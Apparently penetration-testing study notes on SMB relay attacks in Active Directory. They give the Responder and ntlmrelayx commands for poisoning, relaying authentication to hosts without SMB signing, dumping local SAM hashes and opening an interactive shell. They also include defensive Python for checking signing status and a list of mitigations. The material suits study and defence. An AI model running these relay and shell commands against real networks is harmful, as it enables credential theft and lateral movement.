SMB Relay: An AD Attack
What is SMB Relay?
- Instead of cracking the hashes gathered with Responder, we can relay them to specific machines and potentially gain access.
Requirements:
- SMB signing must be disabled on the target.
- The relayed user's credentials must have local admin rights on the target machine.
SMB signing lets the server verify that each packet really comes from the client that authenticated and has not been altered in transit, because every packet is signed with a key derived from that client's credentials.
If SMB signing is required, the relayed session fails: the server will not act on unsigned or wrongly signed packets, so it effectively tells the relaying host that it is not the party that authenticated.
If SMB signing is disabled, the server only sees a valid username and a valid authentication response, so it lets the session in, whoever forwarded it.
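To make that mechanism concrete, here is an added toy model in Python. It is not part of the original notes and it is not the real NTLM or SMB2 cryptography: HMAC-SHA256 stands in for the authentication response, the session key derivation and the per-packet signature, and the user, password and request are constructed. What it shows is structural: the server accepts a relayed authentication response in both modes, but with signing required the relay cannot sign a single request, because it never held the secret from which the session key is derived.

```python
"""Toy model of why SMB signing defeats a relayed authentication.

Added illustration, not from the original notes and not the real NTLM/SMB2
algorithms. HMAC-SHA256 stands in for the NTLM response, the session key
derivation and the SMB2 message signature.
"""
import hashlib
import hmac
import os
from typing import Optional


def toy_response(nt_hash: bytes, challenge: bytes) -> bytes:
    """Stand-in for the NTLM response: proves possession of the hash."""
    return hmac.new(nt_hash, challenge, hashlib.sha256).digest()


def toy_session_key(nt_hash: bytes, challenge: bytes) -> bytes:
    """Stand-in for the session key that both real endpoints derive from the secret."""
    return hmac.new(nt_hash, b"session" + challenge, hashlib.sha256).digest()


def toy_sign(session_key: bytes, message: bytes) -> bytes:
    """Stand-in for the per-message SMB signature."""
    return hmac.new(session_key, message, hashlib.sha256).digest()


class ToyServer:
    """A file server that knows its users' hashes and may require signing."""

    def __init__(self, users: dict, signing_required: bool) -> None:
        self.users = users
        self.signing_required = signing_required
        self.pending = set()    # challenges issued but not yet answered
        self.sessions = {}      # session id -> session key

    def new_challenge(self) -> bytes:
        challenge = os.urandom(8)
        self.pending.add(challenge)
        return challenge

    def authenticate(self, user: str, challenge: bytes, response: bytes) -> Optional[bytes]:
        """Accepts any correct response; it cannot tell who forwarded it."""
        if challenge not in self.pending or user not in self.users:
            return None
        self.pending.discard(challenge)
        expected = toy_response(self.users[user], challenge)
        if not hmac.compare_digest(expected, response):
            return None
        session_id = os.urandom(4)
        self.sessions[session_id] = toy_session_key(self.users[user], challenge)
        return session_id

    def handle(self, session_id: bytes, message: bytes, signature: Optional[bytes]) -> bool:
        """Executes a request on an established session; signing gates it."""
        key = self.sessions.get(session_id)
        if key is None:
            return False
        if not self.signing_required:
            return True            # signing disabled: any session request is honoured
        if signature is None:
            return False           # signing required: unsigned requests are dropped
        return hmac.compare_digest(toy_sign(key, message), signature)


def simulate(signing_required: bool) -> dict:
    """Replay the scenario from the notes: a poisoned client authenticates through a relay."""
    victim_hash = hashlib.sha256(b"constructed-example-password").digest()  # constructed
    server = ToyServer({"alice": victim_hash}, signing_required)

    # 1. The relay opens a session to the server and receives a challenge.
    challenge = server.new_challenge()
    # 2. The relay hands that challenge to the poisoned client, which answers it.
    response = toy_response(victim_hash, challenge)
    # 3. The relay forwards the answer; the server sees a valid response either way.
    session = server.authenticate("alice", challenge, response)
    relay_auth_accepted = session is not None

    # 4. The relay tries to use the session. It never saw victim_hash, so the best
    #    it can do is send the request unsigned or with a guessed signature.
    command = b"constructed request: read a share"
    relay_command_accepted = (server.handle(session, command, None)
                              or server.handle(session, command, os.urandom(32)))

    # 5. For comparison, the real client can derive the key and signs correctly.
    client_key = toy_session_key(victim_hash, challenge)
    legit_command_accepted = server.handle(session, command, toy_sign(client_key, command))

    return {
        "relay_auth_accepted": relay_auth_accepted,
        "relay_command_accepted": relay_command_accepted,
        "legit_command_accepted": legit_command_accepted,
    }


if __name__ == "__main__":
    for required in (False, True):
        print(f"signing_required={required}: {simulate(required)}")
```

The authentication step succeeds in both runs, which is exactly why relay works at all: the server checks the response, not who carried it. Only the signing step distinguishes the relay from the real client, which is why "enable SMB signing" is listed first under the defences at the end of these notes.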
Steps:
Step 1: Edit Responder.conf
Open Responder.conf (e.g. with gedit) and turn off the HTTP and SMB servers, so that Responder keeps poisoning but leaves those ports free for the relay to answer.
Step 2: Run Responder
Command: python Responder.py -I tun0 -rdw
Step 3: Set up your relay
python ntlmrelayx.py -tf targets.txt -smb2support
Step 4: An event occurs…
Step 5: Win
Just as Linux has the shadow file, Windows has the SAM file, which stores the local account hashes.
The hashes dumped by the relay are those of local users, not domain users.
Even so, these local user hashes can be enough to take down the entire network.
Discovering Hosts with SMB Signing Disabled
First we need to identify which hosts have SMB signing enabled and which have it disabled.
There are a few ways to identify this:
- With a Nessus scan: it will report which servers have SMB signing disabled.
- With Nmap: we use an Nmap script to check SMB signing.
Checking Using Nmap:
Command: nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24
This checks SMB signing across the whole network.
We then put the IP addresses of the hosts with signing disabled into a file named targets.txt, one per line.
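To turn the one-off nmap check into a repeatable audit, here is an added Python example. It is not code from the original notes or from nmap: it parses nmap's normal text output for the smb2-security-mode script, maps each host to required/enabled/disabled signing, and returns the hosts that still accept unsigned sessions together with the setting that fixes them. The scan output embedded in it is constructed; the MS-SMB2 SecurityMode bits and the RequireSecuritySignature registry values are real. One caveat it encodes that the notes gloss over: nmap reports three states, and "Message signing enabled but not required" (the Windows workstation default) is just as relayable as "disabled"; only "enabled and required" stops the attack.

```python
"""Audit nmap smb2-security-mode output for hosts where SMB signing is not required.

Added example; not from the original notes or from nmap. Assumes nmap's normal
text output (-oN / stdout); the sample scan below is constructed.
"""
import re
from dataclasses import dataclass

# SecurityMode flags in the SMB2 NEGOTIATE response (MS-SMB2 2.2.4).
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x01
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x02

# Registry values behind the "Digitally sign communications (always)" policies;
# a host stops being relayable once the server-side value is 1 (required).
SERVER_SIGNING_VALUE = r"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\RequireSecuritySignature"
CLIENT_SIGNING_VALUE = r"HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters\RequireSecuritySignature"

_NMAP_MESSAGES = {  # nmap's wording -> our state
    "enabled and required": "required",
    "enabled but not required": "enabled",
    "disabled and not required": "disabled",
}
_HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\d{1,3}(?:\.\d{1,3}){3})\))?")
_DIALECT_RE = re.compile(r"^\|\s+(\d+(?:[.:]\d+)*):\s*$")  # "3:1:1:" (or "3.1.1:")
_MODE_RE = re.compile(r"Message signing (" + "|".join(_NMAP_MESSAGES) + ")")


@dataclass
class HostResult:
    host: str
    dialect: str
    signing: str  # "required", "enabled" (but not required) or "disabled"

    @property
    def relay_possible(self) -> bool:
        # Only "required" defeats relay; "enabled" still accepts unsigned sessions.
        return self.signing != "required"


def classify_security_mode(flags: int) -> str:
    """Map a raw SecurityMode byte to the same three states nmap reports."""
    if flags & SMB2_NEGOTIATE_SIGNING_REQUIRED:
        return "required"
    if flags & SMB2_NEGOTIATE_SIGNING_ENABLED:
        return "enabled"
    return "disabled"


def parse_nmap_output(text: str) -> list:
    """Walk nmap's text output and collect one HostResult per host that reported."""
    results, host, dialect = [], None, None
    for line in text.splitlines():
        m = _HOST_RE.match(line)
        if m:
            host, dialect = m.group(2) or m.group(1), None  # prefer the IP
            continue
        m = _DIALECT_RE.match(line)
        if m:
            dialect = m.group(1)
            continue
        m = _MODE_RE.search(line)
        if m and host:
            results.append(HostResult(host, dialect or "?", _NMAP_MESSAGES[m.group(1)]))
    return results


def relay_candidates(results: list) -> list:
    """Hosts for the remediation list (the same hosts a tester would put in targets.txt)."""
    return sorted({r.host for r in results if r.relay_possible})


def remediation_report(results: list) -> list:
    """One line per host: what the scan saw and which setting fixes it."""
    lines = []
    for r in results:
        if r.relay_possible:
            lines.append(f"{r.host}: SMB {r.dialect} signing {r.signing}; "
                         f"set {SERVER_SIGNING_VALUE}=1 (clients: {CLIENT_SIGNING_VALUE}=1)")
        else:
            lines.append(f"{r.host}: SMB {r.dialect} signing required; OK")
    return lines


# Constructed sample of nmap's text output; addresses, names and dialects are made up.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.57.10
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for dc01.lab.local (192.168.57.5)
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.168.57.22
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing disabled and not required
"""

if __name__ == "__main__":
    scan = parse_nmap_output(SAMPLE_NMAP_OUTPUT)
    print("\n".join(remediation_report(scan)))
    print("targets.txt:", *relay_candidates(scan))
```

Run it against a real scan with `nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24 -oN scan.txt` and feed the file to parse_nmap_output; the same audit, re-run after rolling out the signing policy, is how you verify that the first mitigation listed under the defences below has actually taken effect.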
SMB Relay Attack
Now we will turn off the HTTP and SMB in /etc/responder/Responder.conf
Now we start the responder.
Command: responder -I eth0 -rdwv
Now we start the relay:
Command: ntlmrelayx.py -tf targets.txt -smb2support
Now we trigger the event on the target machine:
Now we have the hashes:
We can also get Interactive shell by using ntlmrelayx.py
Command: ntlmrelayx.py -tf targets.txt -smb2support -i
Here -i means interactive: it gives us an interactive shell.
-tf means target file.
Now we will do the same process to trigger the event.
Now we have a shell bound on our local host on port 11000.
Now we open another tab and use netcat to connect to that shell.
Command: nc 127.0.0.1 11000
Now we have the shell.
We can gain a shell with multiple methods:
- psexec
- smbexec
- metasploit (psexec)
- wmiexec
SMB Relay Attack Defences
Mitigation strategies:
Enable SMB signing on all devices:
- Pro: Completely stops the attack.
- Con: Can cause performance issues with file copies.
Disable NTLM authentication on the network:
- Pro: Completely stops the attack.
- Con: If Kerberos stops working, Windows defaults back to NTLM.
Account tiering:
- Pro: Limits domain admins to specific tasks (e.g. only logging onto servers that need DA).
- Con: Enforcing the policy may be difficult.
Local admin restriction:
- Pro: Can prevent a lot of lateral movement.
- Con: Potential increase in the amount of service desk tickets.